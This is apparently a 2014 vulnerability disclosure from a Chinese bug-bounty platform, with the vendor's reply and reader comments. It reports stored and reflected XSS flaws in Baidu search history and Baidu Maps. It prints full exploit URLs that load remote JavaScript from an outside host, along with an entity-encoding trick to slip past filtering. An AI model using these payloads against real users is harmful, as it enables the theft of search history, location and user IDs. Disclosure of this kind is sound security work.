百度搜索存储型XSS漏洞

1.在百度搜索的东西，会在百度个人中心留下搜索历史记录

2.所以我在百度搜索

http://www.baidu.com/s?wd=%22onmouseover =%22var%20s=document.create%26%2369%3blement('script');s.src='http://fripside.sinaapp.com/';document.body.append%26%2367%3bhild(s);%22

3.在个人中心会留下记录，会出现XSS漏洞，如图

4.上面连接，会把大写字母转换到小写字母，控制台会报错,如图

5.因为下面图上两个本来应该大写的字母变成小写字母了

6.所以要把大写B和大写C，转码之就不会报错了

B → B → %26%2366%3b

C → C → %26%2367%3b

-----------------------------------------------------------------------------------

7.这个是self XSS吗？？百度搜索每天用的人那么多，如果乱七八糟的网站，强制你搜索这段代码，就不是跨自己了.如果网站这样呢，如图

------------------------------------------------------------------------------------------

8.这里顺便也提交个百度地图另外一边的XSS漏洞，就不会废话了，直接上连接

http://map.baidu.com/?newmap=1&shareurl=1&l=15&tn=B_NORMAL_MAP&c=13376526,3516728&i=0,1,1&s=bt%26bttp%3D0%26c%3D179%26sy%3D0%26en%3D1%24%24d506b2fea993829688b988e8%24%2413373701.000000%2C3516044.000000%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA'onmouseover%253d%22var%20e%253ddocument.createElement('script');e.setAttribute('src','http://fripside.sinaapp.com/aaaaaa.js');document.body.appendChild(e)%22style%253d%22font-size:999px;cursor:%20default%20!important;%24%24%24%24%24%24%26sn%3D1%24%24f9fd6062990a5b1e0f0e6be9%24%2413379295.000000%2C3516515.000000%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%24%26sq%3D%E8%A5%BF%E6%B9%96%E5%8C%BA%26eq%3D%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%26exptype%3Ddep%26exptime%3D2014-08-23%2004%3A10%26version%3D5

9.访问之后把鼠标移到左边就会获取地理位置和用户ID

1.百度个人中心XSS代码

http://www.baidu.com/s?wd=%22onmouseover =%22var%20s=document.create%26%2369%3blement('script');s.src='http://fripside.sinaapp.com/';document.body.append%26%2367%3bhild(s);%22

2.百度地图XSS

http://map.baidu.com/?newmap=1&shareurl=1&l=15&tn=B_NORMAL_MAP&c=13376526,3516728&i=0,1,1&s=bt%26bttp%3D0%26c%3D179%26sy%3D0%26en%3D1%24%24d506b2fea993829688b988e8%24%2413373701.000000%2C3516044.000000%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA'onmouseover%253d%22var%20e%253ddocument.createElement('script');e.setAttribute('src','http://fripside.sinaapp.com/aaaaaa.js');document.body.appendChild(e)%22style%253d%22font-size:999px;cursor:%20default%20!important;%24%24%24%24%24%24%26sn%3D1%24%24f9fd6062990a5b1e0f0e6be9%24%2413379295.000000%2C3516515.000000%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%24%26sq%3D%E8%A5%BF%E6%B9%96%E5%8C%BA%26eq%3D%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%26exptype%3Ddep%26exptime%3D2014-08-23%2004%3A10%26version%3D5

百度个人中心虽然无法获取到cook,但是可以获取用户的搜索历史记录，百度地图虽然获取不到cook,但是可以获取ID对应所在地点

1.百度个人中心因为双引号被过滤，百度地图因为单引号没过滤,百度地图，前两次修复，只是修复了输出点，不是我吹牛，治标不治本，过滤方式会导致出现同样的问题

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-08-25 21:52

厂商回复：

感谢提交，我们已联系业务部门处理此问题。

最新状态：

暂无

1. 2014-08-25 17:56 | xsser ( 普通白帽子 | Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

   0

   你关注的白帽子 q601333824 发表了漏洞 百度搜索存储型XSS漏洞

   1# 回复此人

2. 2014-08-25 18:01 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

   0

   你关注的白帽子 q601333824 发表了漏洞 百度搜索存储型XSS漏洞

   2# 回复此人

3. 2014-08-26 08:51 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

   0

   你关注的白帽子 q601333824 发表了漏洞 百度搜索存储型XSS漏洞

   3# 回复此人

4. 2014-08-29 08:04 | 天际 ( 路人 | Rank:3 漏洞数:1 | 我只是在打酱油)

   0

   你关注的白帽子 q601333824 发表了漏洞 百度搜索存储型XSS漏洞

   4# 回复此人

5. 2014-10-02 21:28 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

   0

   你email多少？

   5# 回复此人

6. 2014-10-09 18:26 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

   0

   表示没处理掉

   6# 回复此人

7. 2014-10-09 18:30 | q601333824 ( 普通白帽子 | Rank:277 漏洞数:58 | 出自《狐妖小红娘》---自古人妖生死恋，千...)

   0

   @鱼化石 后来用新号查看，那个功能是关闭状态，没开的，毕竟有点鸡肋，记录浏览记录的功能感觉没多少人用

   7# 回复此人

8. 2014-10-09 20:24 | 大漠長河 ( 实习白帽子 | Rank:66 漏洞数:10 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区枫叶正...)

   0

   @q601333824 漠漠开着那 学习了 有价值

   8# 回复此人

9. 2014-10-10 00:36 | 苍崎深雪 ( 路人 | Rank:3 漏洞数:2 | 微光)

   0

   我看到了fripSide！

   9# 回复此人

10. 2014-10-11 09:13 | 香草 ( 普通白帽子 | Rank:103 漏洞数:15 | javascript,xss,jsp、aspx)

    0

    地图这个有点意思，可以定位

    10# 回复此人

11. 2014-10-25 21:20 | 大漠長河 ( 实习白帽子 | Rank:66 漏洞数:10 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区枫叶正...)

    0

    拿走 学习用

    11# 回复此人

12. 2015-04-26 15:16 | 昌维 ( 路人 | Rank:15 漏洞数:4 | QQ：867597730，百度贴吧ID：昌维001 个人...)

    0

    问题是有多少人会去闲的没事看自己的搜索记录。=_=

    12# 回复此人